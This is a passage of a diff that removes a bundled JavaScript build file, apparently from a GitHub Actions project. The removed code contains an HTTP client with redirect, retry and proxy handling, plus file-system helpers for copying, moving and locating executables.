- HttpCodes[HttpCodes["OK"] = 200] = "OK"; - HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; - HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; - HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; - HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; - HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; - HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; - HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; - HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; - HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; - HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; - HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; - HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; - HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; - HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; - HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; - HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; - HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; - HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; - HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; - HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; - HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; - HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; - HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; - HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; - HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; - HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; -})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); -var Headers; -(function (Headers) { - Headers["Accept"] = "accept"; - Headers["ContentType"] = "content-type"; -})(Headers || (exports.Headers = Headers = {})); -var MediaTypes; -(function (MediaTypes) { - MediaTypes["ApplicationJson"] = "application/json"; -})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); -/** - * Returns the proxy URL, depending upon the supplied url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com - */ -function getProxyUrl(serverUrl) { - const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); - return proxyUrl ? proxyUrl.href : ''; -} -exports.getProxyUrl = getProxyUrl; -const HttpRedirectCodes = [ - HttpCodes.MovedPermanently, - HttpCodes.ResourceMoved, - HttpCodes.SeeOther, - HttpCodes.TemporaryRedirect, - HttpCodes.PermanentRedirect -]; -const HttpResponseRetryCodes = [ - HttpCodes.BadGateway, - HttpCodes.ServiceUnavailable, - HttpCodes.GatewayTimeout -]; -const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; -const ExponentialBackoffCeiling = 10; -const ExponentialBackoffTimeSlice = 5; -class HttpClientError extends Error { - constructor(message, statusCode) { - super(message); - this.name = 'HttpClientError'; - this.statusCode = statusCode; - Object.setPrototypeOf(this, HttpClientError.prototype); - } -} -exports.HttpClientError = HttpClientError; -class HttpClientResponse { - constructor(message) { - this.message = message; - } - readBody() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - let output = Buffer.alloc(0); - this.message.on('data', (chunk) => { - output = Buffer.concat([output, chunk]); - }); - this.message.on('end', () => { - resolve(output.toString()); - }); - })); - }); - } - readBodyBuffer() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - const chunks = []; - this.message.on('data', (chunk) => { - chunks.push(chunk); - }); - this.message.on('end', () => { - resolve(Buffer.concat(chunks)); - }); - })); - }); - } -} -exports.HttpClientResponse = HttpClientResponse; -function isHttps(requestUrl) { - const parsedUrl = new URL(requestUrl); - return parsedUrl.protocol === 'https:'; -} -exports.isHttps = isHttps; -class HttpClient { - constructor(userAgent, handlers, requestOptions) { - this._ignoreSslError = false; - this._allowRedirects = true; - this._allowRedirectDowngrade = false; - this._maxRedirects = 50; - this._allowRetries = false; - this._maxRetries = 1; - this._keepAlive = false; - this._disposed = false; - this.userAgent = userAgent; - this.handlers = handlers || []; - this.requestOptions = requestOptions; - if (requestOptions) { - if (requestOptions.ignoreSslError != null) { - this._ignoreSslError = requestOptions.ignoreSslError; - } - this._socketTimeout = requestOptions.socketTimeout; - if (requestOptions.allowRedirects != null) { - this._allowRedirects = requestOptions.allowRedirects; - } - if (requestOptions.allowRedirectDowngrade != null) { - this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; - } - if (requestOptions.maxRedirects != null) { - this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); - } - if (requestOptions.keepAlive != null) { - this._keepAlive = requestOptions.keepAlive; - } - if (requestOptions.allowRetries != null) { - this._allowRetries = requestOptions.allowRetries; - } - if (requestOptions.maxRetries != null) { - this._maxRetries = requestOptions.maxRetries; - } - } - } - options(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); - }); - } - get(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('GET', requestUrl, null, additionalHeaders || {}); - }); - } - del(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('DELETE', requestUrl, null, additionalHeaders || {}); - }); - } - post(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('POST', requestUrl, data, additionalHeaders || {}); - }); - } - patch(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('PATCH', requestUrl, data, additionalHeaders || {}); - }); - } - put(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('PUT', requestUrl, data, additionalHeaders || {}); - }); - } - head(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('HEAD', requestUrl, null, additionalHeaders || {}); - }); - } - sendStream(verb, requestUrl, stream, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request(verb, requestUrl, stream, additionalHeaders); - }); - } - /** - * Gets a typed object from an endpoint - * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise - */ - getJson(requestUrl, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - const res = yield this.get(requestUrl, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - postJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.post(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - putJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.put(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - patchJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.patch(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - /** - * Makes a raw http request. - * All other methods such as get, post, patch, and request ultimately call this. - * Prefer get, del, post and patch - */ - request(verb, requestUrl, data, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (this._disposed) { - throw new Error('Client has already been disposed.'); - } - const parsedUrl = new URL(requestUrl); - let info = this._prepareRequest(verb, parsedUrl, headers); - // Only perform retries on reads since writes may not be idempotent. - const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) - ? this._maxRetries + 1 - : 1; - let numTries = 0; - let response; - do { - response = yield this.requestRaw(info, data); - // Check if it's an authentication challenge - if (response && - response.message && - response.message.statusCode === HttpCodes.Unauthorized) { - let authenticationHandler; - for (const handler of this.handlers) { - if (handler.canHandleAuthentication(response)) { - authenticationHandler = handler; - break; - } - } - if (authenticationHandler) { - return authenticationHandler.handleAuthentication(this, info, data); - } - else { - // We have received an unauthorized response but have no handlers to handle it. - // Let the response return to the caller. - return response; - } - } - let redirectsRemaining = this._maxRedirects; - while (response.message.statusCode && - HttpRedirectCodes.includes(response.message.statusCode) && - this._allowRedirects && - redirectsRemaining > 0) { - const redirectUrl = response.message.headers['location']; - if (!redirectUrl) { - // if there's no location to redirect to, we won't - break; - } - const parsedRedirectUrl = new URL(redirectUrl); - if (parsedUrl.protocol === 'https:' && - parsedUrl.protocol !== parsedRedirectUrl.protocol && - !this._allowRedirectDowngrade) { - throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); - } - // we need to finish reading the response before reassigning response - // which will leak the open socket. - yield response.readBody(); - // strip authorization header if redirected to a different hostname - if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { - for (const header in headers) { - // header names are case insensitive - if (header.toLowerCase() === 'authorization') { - delete headers[header]; - } - } - } - // let's make the request with the new redirectUrl - info = this._prepareRequest(verb, parsedRedirectUrl, headers); - response = yield this.requestRaw(info, data); - redirectsRemaining--; - } - if (!response.message.statusCode || - !HttpResponseRetryCodes.includes(response.message.statusCode)) { - // If not a retry code, return immediately instead of retrying - return response; - } - numTries += 1; - if (numTries < maxTries) { - yield response.readBody(); - yield this._performExponentialBackoff(numTries); - } - } while (numTries < maxTries); - return response; - }); - } - /** - * Needs to be called if keepAlive is set to true in request options. - */ - dispose() { - if (this._agent) { - this._agent.destroy(); - } - this._disposed = true; - } - /** - * Raw request. - * @param info - * @param data - */ - requestRaw(info, data) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => { - function callbackForResult(err, res) { - if (err) { - reject(err); - } - else if (!res) { - // If `err` is not passed, then `res` must be passed. - reject(new Error('Unknown error')); - } - else { - resolve(res); - } - } - this.requestRawWithCallback(info, data, callbackForResult); - }); - }); - } - /** - * Raw request with callback. - * @param info - * @param data - * @param onResult - */ - requestRawWithCallback(info, data, onResult) { - if (typeof data === 'string') { - if (!info.options.headers) { - info.options.headers = {}; - } - info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); - } - let callbackCalled = false; - function handleResult(err, res) { - if (!callbackCalled) { - callbackCalled = true; - onResult(err, res); - } - } - const req = info.httpModule.request(info.options, (msg) => { - const res = new HttpClientResponse(msg); - handleResult(undefined, res); - }); - let socket; - req.on('socket', sock => { - socket = sock; - }); - // If we ever get disconnected, we want the socket to timeout eventually - req.setTimeout(this._socketTimeout || 3 * 60000, () => { - if (socket) { - socket.end(); - } - handleResult(new Error(`Request timeout: ${info.options.path}`)); - }); - req.on('error', function (err) { - // err has statusCode property - // res should have headers - handleResult(err); - }); - if (data && typeof data === 'string') { - req.write(data, 'utf8'); - } - if (data && typeof data !== 'string') { - data.on('close', function () { - req.end(); - }); - data.pipe(req); - } - else { - req.end(); - } - } - /** - * Gets an http agent. This function is useful when you need an http agent that handles - * routing through a proxy server - depending upon the url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com - */ - getAgent(serverUrl) { - const parsedUrl = new URL(serverUrl); - return this._getAgent(parsedUrl); - } - getAgentDispatcher(serverUrl) { - const parsedUrl = new URL(serverUrl); - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if (!useProxy) { - return; - } - return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); - } - _prepareRequest(method, requestUrl, headers) { - const info = {}; - info.parsedUrl = requestUrl; - const usingSsl = info.parsedUrl.protocol === 'https:'; - info.httpModule = usingSsl ? https : http; - const defaultPort = usingSsl ? 443 : 80; - info.options = {}; - info.options.host = info.parsedUrl.hostname; - info.options.port = info.parsedUrl.port - ? parseInt(info.parsedUrl.port) - : defaultPort; - info.options.path = - (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); - info.options.method = method; - info.options.headers = this._mergeHeaders(headers); - if (this.userAgent != null) { - info.options.headers['user-agent'] = this.userAgent; - } - info.options.agent = this._getAgent(info.parsedUrl); - // gives handlers an opportunity to participate - if (this.handlers) { - for (const handler of this.handlers) { - handler.prepareRequest(info.options); - } - } - return info; - } - _mergeHeaders(headers) { - if (this.requestOptions && this.requestOptions.headers) { - return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); - } - return lowercaseKeys(headers || {}); - } - _getExistingOrDefaultHeader(additionalHeaders, header, _default) { - let clientHeader; - if (this.requestOptions && this.requestOptions.headers) { - clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; - } - return additionalHeaders[header] || clientHeader || _default; - } - _getAgent(parsedUrl) { - let agent; - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if (this._keepAlive && useProxy) { - agent = this._proxyAgent; - } - if (this._keepAlive && !useProxy) { - agent = this._agent; - } - // if agent is already assigned use that agent. - if (agent) { - return agent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - let maxSockets = 100; - if (this.requestOptions) { - maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; - } - // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. - if (proxyUrl && proxyUrl.hostname) { - const agentOptions = { - maxSockets, - keepAlive: this._keepAlive, - proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { - proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` - })), { host: proxyUrl.hostname, port: proxyUrl.port }) - }; - let tunnelAgent; - const overHttps = proxyUrl.protocol === 'https:'; - if (usingSsl) { - tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; - } - else { - tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; - } - agent = tunnelAgent(agentOptions); - this._proxyAgent = agent; - } - // if reusing agent across request and tunneling agent isn't assigned create a new agent - if (this._keepAlive && !agent) { - const options = { keepAlive: this._keepAlive, maxSockets }; - agent = usingSsl ? new https.Agent(options) : new http.Agent(options); - this._agent = agent; - } - // if not using private agent and tunnel agent isn't setup then use global agent - if (!agent) { - agent = usingSsl ? https.globalAgent : http.globalAgent; - } - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - agent.options = Object.assign(agent.options || {}, { - rejectUnauthorized: false - }); - } - return agent; - } - _getProxyAgentDispatcher(parsedUrl, proxyUrl) { - let proxyAgent; - if (this._keepAlive) { - proxyAgent = this._proxyAgentDispatcher; - } - // if agent is already assigned use that agent. - if (proxyAgent) { - return proxyAgent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { - token: `${proxyUrl.username}:${proxyUrl.password}` - }))); - this._proxyAgentDispatcher = proxyAgent; - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { - rejectUnauthorized: false - }); - } - return proxyAgent; - } - _performExponentialBackoff(retryNumber) { - return __awaiter(this, void 0, void 0, function* () { - retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); - const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); - return new Promise(resolve => setTimeout(() => resolve(), ms)); - }); - } - _processResponse(res, options) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - const statusCode = res.message.statusCode || 0; - const response = { - statusCode, - result: null, - headers: {} - }; - // not found leads to null obj returned - if (statusCode === HttpCodes.NotFound) { - resolve(response); - } - // get the result from the body - function dateTimeDeserializer(key, value) { - if (typeof value === 'string') { - const a = new Date(value); - if (!isNaN(a.valueOf())) { - return a; - } - } - return value; - } - let obj; - let contents; - try { - contents = yield res.readBody(); - if (contents && contents.length > 0) { - if (options && options.deserializeDates) { - obj = JSON.parse(contents, dateTimeDeserializer); - } - else { - obj = JSON.parse(contents); - } - response.result = obj; - } - response.headers = res.message.headers; - } - catch (err) { - // Invalid resource (contents not json); leaving result obj null - } - // note that 3xx redirects are handled by the http layer. - if (statusCode > 299) { - let msg; - // if exception/error in body, attempt to get better error - if (obj && obj.message) { - msg = obj.message; - } - else if (contents && contents.length > 0) { - // it may be the case that the exception is in the body message as string - msg = contents; - } - else { - msg = `Failed request: (${statusCode})`; - } - const err = new HttpClientError(msg, statusCode); - err.result = response.result; - reject(err); - } - else { - resolve(response); - } - })); - }); - } -} -exports.HttpClient = HttpClient; -const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); -//# sourceMappingURL=index.js.map - -/***/ }), - -/***/ 9835: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.checkBypass = exports.getProxyUrl = void 0; -function getProxyUrl(reqUrl) { - const usingSsl = reqUrl.protocol === 'https:'; - if (checkBypass(reqUrl)) { - return undefined; - } - const proxyVar = (() => { - if (usingSsl) { - return process.env['https_proxy'] || process.env['HTTPS_PROXY']; - } - else { - return process.env['http_proxy'] || process.env['HTTP_PROXY']; - } - })(); - if (proxyVar) { - try { - return new URL(proxyVar); - } - catch (_a) { - if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) - return new URL(`http://${proxyVar}`); - } - } - else { - return undefined; - } -} -exports.getProxyUrl = getProxyUrl; -function checkBypass(reqUrl) { - if (!reqUrl.hostname) { - return false; - } - const reqHost = reqUrl.hostname; - if (isLoopbackAddress(reqHost)) { - return true; - } - const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; - if (!noProxy) { - return false; - } - // Determine the request port - let reqPort; - if (reqUrl.port) { - reqPort = Number(reqUrl.port); - } - else if (reqUrl.protocol === 'http:') { - reqPort = 80; - } - else if (reqUrl.protocol === 'https:') { - reqPort = 443; - } - // Format the request hostname and hostname with port - const upperReqHosts = [reqUrl.hostname.toUpperCase()]; - if (typeof reqPort === 'number') { - upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); - } - // Compare request host against noproxy - for (const upperNoProxyItem of noProxy - .split(',') - .map(x => x.trim().toUpperCase()) - .filter(x => x)) { - if (upperNoProxyItem === '*' || - upperReqHosts.some(x => x === upperNoProxyItem || - x.endsWith(`.${upperNoProxyItem}`) || - (upperNoProxyItem.startsWith('.') && - x.endsWith(`${upperNoProxyItem}`)))) { - return true; - } - } - return false; -} -exports.checkBypass = checkBypass; -function isLoopbackAddress(host) { - const hostLower = host.toLowerCase(); - return (hostLower === 'localhost' || - hostLower.startsWith('127.') || - hostLower.startsWith('[::1]') || - hostLower.startsWith('[0:0:0:0:0:0:0:1]')); -} -//# sourceMappingURL=proxy.js.map - -/***/ }), - -/***/ 1962: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var _a; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getCmdPath = exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -_a = fs.promises -// export const {open} = 'fs' -, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; -// export const {open} = 'fs' -exports.IS_WINDOWS = process.platform === 'win32'; -// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 -exports.UV_FS_O_EXLOCK = 0x10000000; -exports.READONLY = fs.constants.O_RDONLY; -function exists(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - try { - yield exports.stat(fsPath); - } - catch (err) { - if (err.code === 'ENOENT') { - return false; - } - throw err; - } - return true; - }); -} -exports.exists = exists; -function isDirectory(fsPath, useStat = false) { - return __awaiter(this, void 0, void 0, function* () { - const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); - return stats.isDirectory(); - }); -} -exports.isDirectory = isDirectory; -/** - * On OSX/Linux, true if path starts with '/'. On Windows, true for paths like: - * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). - */ -function isRooted(p) { - p = normalizeSeparators(p); - if (!p) { - throw new Error('isRooted() parameter "p" cannot be empty'); - } - if (exports.IS_WINDOWS) { - return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello - ); // e.g. C: or C:\hello - } - return p.startsWith('/'); -} -exports.isRooted = isRooted; -/** - * Best effort attempt to determine whether a file exists and is executable. - * @param filePath file path to check - * @param extensions additional file extensions to try - * @return if file exists and is executable, returns the file path. otherwise empty string. - */ -function tryGetExecutablePath(filePath, extensions) { - return __awaiter(this, void 0, void 0, function* () { - let stats = undefined; - try { - // test file exists - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // on Windows, test for valid extension - const upperExt = path.extname(filePath).toUpperCase(); - if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { - return filePath; - } - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - // try each extension - const originalFilePath = filePath; - for (const extension of extensions) { - filePath = originalFilePath + extension; - stats = undefined; - try { - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // preserve the case of the actual file (since an extension was appended) - try { - const directory = path.dirname(filePath); - const upperName = path.basename(filePath).toUpperCase(); - for (const actualName of yield exports.readdir(directory)) { - if (upperName === actualName.toUpperCase()) { - filePath = path.join(directory, actualName); - break; - } - } - } - catch (err) { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); - } - return filePath; - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - } - return ''; - }); -} -exports.tryGetExecutablePath = tryGetExecutablePath; -function normalizeSeparators(p) { - p = p || ''; - if (exports.IS_WINDOWS) { - // convert slashes on Windows - p = p.replace(/\//g, '\\'); - // remove redundant slashes - return p.replace(/\\\\+/g, '\\'); - } - // remove redundant slashes - return p.replace(/\/\/+/g, '/'); -} -// on Mac/Linux, test the execute bit -// R W X R W X R W X -// 256 128 64 32 16 8 4 2 1 -function isUnixExecutable(stats) { - return ((stats.mode & 1) > 0 || - ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || - ((stats.mode & 64) > 0 && stats.uid === process.getuid())); -} -// Get the path of cmd.exe in windows -function getCmdPath() { - var _a; - return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; -} -exports.getCmdPath = getCmdPath; -//# sourceMappingURL=io-util.js.map - -/***/ }), - -/***/ 7436: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; -const assert_1 = __nccwpck_require__(9491); -const path = __importStar(__nccwpck_require__(1017)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -/** - * Copies a file or folder. - * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js - * - * @param source source path - * @param dest destination path - * @param options optional. See CopyOptions. - */ -function cp(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - const { force, recursive, copySourceDirectory } = readCopyOptions(options); - const destStat = (yield ioUtil.exists(dest)) ? yield ioUtil.stat(dest) : null; - // Dest is an existing file, but not forcing - if (destStat && destStat.isFile() && !force) { - return; - } - // If dest is an existing directory, should copy inside. - const newDest = destStat && destStat.isDirectory() && copySourceDirectory - ? path.join(dest, path.basename(source)) - : dest; - if (!(yield ioUtil.exists(source))) { - throw new Error(`no such file or directory: ${source}`); - } - const sourceStat = yield ioUtil.stat(source); - if (sourceStat.isDirectory()) { - if (!recursive) { - throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); - } - else { - yield cpDirRecursive(source, newDest, 0, force); - } - } - else { - if (path.relative(source, newDest) === '') { - // a file cannot be copied to itself - throw new Error(`'${newDest}' and '${source}' are the same file`); - } - yield copyFile(source, newDest, force); - } - }); -} -exports.cp = cp; -/** - * Moves a path. - * - * @param source source path - * @param dest destination path - * @param options optional. See MoveOptions. - */ -function mv(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - if (yield ioUtil.exists(dest)) { - let destExists = true; - if (yield ioUtil.isDirectory(dest)) { - // If dest is directory copy src into dest - dest = path.join(dest, path.basename(source)); - destExists = yield ioUtil.exists(dest); - } - if (destExists) { - if (options.force == null || options.force) { - yield rmRF(dest); - } - else { - throw new Error('Destination already exists'); - } - } - } - yield mkdirP(path.dirname(dest)); - yield ioUtil.rename(source, dest); - }); -} -exports.mv = mv; -/** - * Remove a path recursively with force - * - * @param inputPath path to remove - */ -function rmRF(inputPath) { - return 